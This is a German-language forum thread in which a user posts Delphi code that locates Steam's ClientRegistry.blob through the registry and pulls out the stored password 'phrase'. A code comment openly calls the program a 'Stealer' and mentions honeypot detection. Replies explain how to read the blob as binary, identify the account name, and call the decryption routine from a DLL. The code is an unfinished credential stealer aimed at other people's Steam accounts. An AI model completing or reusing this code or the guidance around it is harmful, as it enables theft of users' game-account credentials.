PHP Forum - Coding Board
November 20, 2017, 01:05:39 *
Willkommen Gast. Bitte einloggen oder registrieren.

Einloggen mit Benutzername, Passwort und Sitzungslänge
News:
 
   Übersicht   Hilfe Suche Einloggen Registrieren  
Seiten: [1]
  Drucken  
Autor Thema: Steam Decryption  (Gelesen 212 mal)
0 Mitglieder und 1 Gast betrachten dieses Thema.
berlinermauer
Full Member
***
Beiträge: 129


Profil anzeigen E-Mail
« am: März 20, 2009, 05:44:54 »

Hallo Leute,

ich habe etwas gecodet und habe hier nun ne Steam decryption.

Frage 1: Wie lange ist das dingens nach Phrase
Frage 2: wie kann ich den passenden user auslesen
FRAGE 3: !! Bug : Delphi gibt mir als text des Files inetwa "KOMISCHESZEICHEN 2 |                     " aus ^^

Code:
function decryptSteam(none: String):Boolean;
begin
// Let's Go!
regist := TRegistry.Create;
regist.RootKey:=HKEY_CURRENT_USER;
regist.OpenKey('Software\Valve\Steam\',true);

SteamPath := regist.ReadString('SteamPath');
SteamPath := Steampath + '/';

// Ok, now got Steam Path

AssignFile(regblob,SteamPath + 'ClientRegistry.blob');
Reset(regblob); // Try to open (requires Admin rights)

try
Read(regblob,regString); // Lese Steam Dingens ein^^
except
// No Steam or not Admin?!
SteamUser := 'NOT AVAILIBLE BECAUSE';
SteamPassword := 'NOT ADMIN (VISTA) or NOT INSTALLED';
end;
Showmessage(regString); // GEBE DATEI ZUM TEST AUS!
I := Pos('phrase',regString); // Change here the Keyword if neccessary

if I > 0 then begin
Delete(regString,I,6);
I := I + 6; // Pointer ist nun auf dem PW String

PWLength := 28; // This is to change better the Decryption lenght of the String
SteamPassword := Copy(regString,I,PWlength);
ShowMessage(SteamPassword);


end

else // No Steam but registry.blob there?! Fuckyou!

{This is usually a Place for a HoneyPot Detection,
because if you got the Key where Steam is installed,
and a clientregistry.blob is avalible i, there must
be an encryptet "Phrase". Perhaps we had an Steam
Update?! You can add here a detection, because even
if a Steam Update was there, the Stealer needs to be
updatet! }

end;
Gespeichert


psychotourist
Newbie
*
Beiträge: 9



Profil anzeigen E-Mail
« Antworten #1 am: März 20, 2009, 06:29:58 »

wieso sind die kommentare abwechseln auf englisch und deutsch?
Gespeichert
berlinermauer
Full Member
***
Beiträge: 129


Profil anzeigen E-Mail
« Antworten #2 am: März 20, 2009, 07:17:29 »

Gespeichert


CorVu5
Newbie
*
Beiträge: 32



Profil anzeigen E-Mail
« Antworten #3 am: März 21, 2009, 12:29:05 »

Du solltest vermutlich die Datei Binär einlesen.
Im übriegn kann ich wie immer nur auf die Seite von aluigi verweisen, da ist der ganze Kram wirklich sehr gut erklärt.
Gespeichert
interNode
Abschaum
Full Member
***
Beiträge: 173



Profil anzeigen E-Mail
« Antworten #4 am: März 22, 2009, 01:49:28 »

Gespeichert

Signatur entfernt, da ich mich für mein eigenes Board schämen muss - Syler

Antw.: Danke und die Verwarnung drückt nur deine Hilfslosigkeit über die Aktion aus. Du bistkein guter Admin. Tut mir Leid.
CorVu5
Newbie
*
Beiträge: 32



Profil anzeigen E-Mail
« Antworten #5 am: März 22, 2009, 01:59:16 »

Das siehst du ganz richtig, das hier soll eine Funktion zum Auslesen des verschlüsselten PWs sein. Zwinkernd
Gespeichert
berlinermauer
Full Member
***
Beiträge: 129


Profil anzeigen E-Mail
« Antworten #6 am: März 22, 2009, 02:45:49 »

öhm naja das decrypten kommt noch dazu, ist noch nicht gecodet Zwinkernd

btw :

1. hast du nen kleines Beispiel zum auslesen von Binär Dateien?
2. Wie finde ich dann raus welcher der AccountNames in \steamapps\ es ist?
3. kleines Beispiel wie ich die Funktion in der DLL starte?
Gespeichert


Zacherl
Entwickler Team
Moderator
Sr. Member
****
Beiträge: 454



Profil anzeigen E-Mail
« Antworten #7 am: März 22, 2009, 04:31:01 »

1.: *Hust* das gehört zu den Delphi Basics. Entweder über einen TFileStream oder über die CreateFile, ReadFile APIs.
2.: Das steht in der Registry. Besuche doch mal die Seite, die CorVu5 genannt hat, da findest du wirklich alles.
3.: *Hust* das gehört doch wohl auch zu den Basics. Dynamisches Importieren von Funktionen aus einer DLL. Den Prototyp der Funktion findest du auch auf der von CorVu5 genannten Seite.
Gespeichert

Seiten: [1]
  Drucken  
 
Gehe zu:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.21 | SMF © 2006-2009, Simple Machines | New Look by Nolt Prüfe XHTML 1.0 Prüfe CSS